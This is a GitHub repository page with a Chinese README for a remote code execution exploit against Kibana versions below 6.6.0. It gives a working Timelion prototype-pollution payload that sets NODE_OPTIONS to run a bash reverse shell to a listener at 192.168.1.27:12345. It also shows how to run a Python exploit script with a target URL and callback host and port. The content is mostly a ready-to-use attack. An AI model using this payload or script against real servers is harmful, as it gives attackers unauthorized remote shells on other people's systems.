Skip to content

GG-o1/kibana-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

kibana-RCE <6.6.0

  • 监听端口

POC:

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.27/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
  • 执行POC

  • 成功反弹shell

脚本使用

python kibana6.6.0RCE.py http://ip:port RHOST RPORT

参考链接

https://github.com/jas502n/kibana-RCE

About

kibana<6.6.0代码执行

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages